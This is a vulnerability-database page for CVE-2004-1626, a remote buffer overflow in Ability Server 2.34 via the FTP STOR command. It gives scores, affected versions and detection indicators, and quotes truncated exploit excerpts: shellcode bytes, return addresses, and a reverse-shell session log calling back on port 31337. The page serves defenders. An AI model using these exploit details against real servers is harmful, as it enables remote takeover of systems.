CVE-2004-1626
published 2004-10-22CVE-2004-1626: Buffer overflow in Ability Server 2.34, and possibly other versions, allows remote attackers to execute arbitrary code via a long STOR command.
PriorityP345medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
67.39%
99.2th percentile
Buffer overflow in Ability Server 2.34, and possibly other versions, allows remote attackers to execute arbitrary code via a long STOR command.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| code-crafters | ability_server | — | — |
| code-crafters | ability_server | — | — |
| code-crafters | ability_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e
bytes↗
\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5a
- →Detect oversized FTP STOR commands (>966 bytes) sent to port 21, indicative of buffer overflow exploitation against Ability Server 2.34 ↗
- →Monitor for FTP STOR commands followed by large payloads containing repeated 0x41 bytes (NOP sled pattern) and shellcode bytes starting with \xd9\xee\xd9\x74 ↗
- →Alert on reverse shell callback connections to port 31337 originating from an Ability FTP Server process after an oversized STOR command is received ↗
- →The vulnerability also affects the APPE command in addition to STOR; monitor both commands for oversized payloads ↗
- →Bad characters in shellcode are 0x00, 0x0a, 0x0d; filter/alert on FTP STOR payloads that avoid these bytes while containing high-entropy binary data ↗
- ·The Windows XP SP2 RET address (0x7D17D737) and Windows 2000 Server SP4 RET address (0x7C2FA0F7) used in exploit 588 are version-specific; detection based on exact byte sequences at the overflow offset will vary by target OS/SP ↗
- ·The vulnerability has been confirmed on version 2.34 but has also been reported in versions 2.25 and 2.32; other versions may also be affected ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
exploitdb·2004-11-07
CVE-2004-1626 Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow
---
/*
no@0x00:~/Exploits/abilityftp$ ./ability-exploit
**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**
[x] Launching listener.
[x] Bind successfull.
[x] Listening on port 31337.
[x] Connected to: 192.168.0.1.
[x] Sending bad code...done.
[x] Waiting for shell.
[x] Got connection from 192.168.0.1.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\abilitywebserver>
reverse shellcode that connects back to 192.168.0.2 lamers get your own shellcode ;)
bad chars 0x00 0x0a 0x0d.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RET "\xC7\xF2\xC8\x77" /*win
Exploit-DB
Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
exploitdb·2004-10-21
CVE-2004-1626 Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
---
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 21 Oct 2004 - muts #
###################################
# D:\BO>ability-2.34-ftp-stor.py #
###################################
# D:\data\tools>nc -v 127.0.0.1 4444 #
# localhost [127.0.0.1] 4444 (?) open #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# D:\Program Files\abilitywebserver> #
###################################
import ftplib
from ftplib import FTP
import struct
print "\n\n################################"
print "\nAbility Server 2.34 FTP STOR buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Pur
Metasploit
Ability Server 2.34 STOR Command Stack Buffer Overflow
metasploit
Ability Server 2.34 STOR Command Stack Buffer Overflow
Ability Server 2.34 STOR Command Stack Buffer Overflow
This module exploits a stack-based buffer overflow in Ability Server 2.34. Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands, which leads to a stack based buffer overflow. This plugin uses the 'STOR' command. The vulnerability has been confirmed on version 2.34 and has also been reported in version 2.25 and 2.32. Other versions may also be affected.
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=109850947508816&w=2http://secunia.com/advisories/12941http://www.kb.cert.org/vuls/id/857846http://www.osvdb.org/11030http://www.securityfocus.com/bid/11508https://exchange.xforce.ibmcloud.com/vulnerabilities/17823http://marc.info/?l=bugtraq&m=109850947508816&w=2http://secunia.com/advisories/12941http://www.kb.cert.org/vuls/id/857846http://www.osvdb.org/11030http://www.securityfocus.com/bid/11508https://exchange.xforce.ibmcloud.com/vulnerabilities/17823
2004-10-22
Published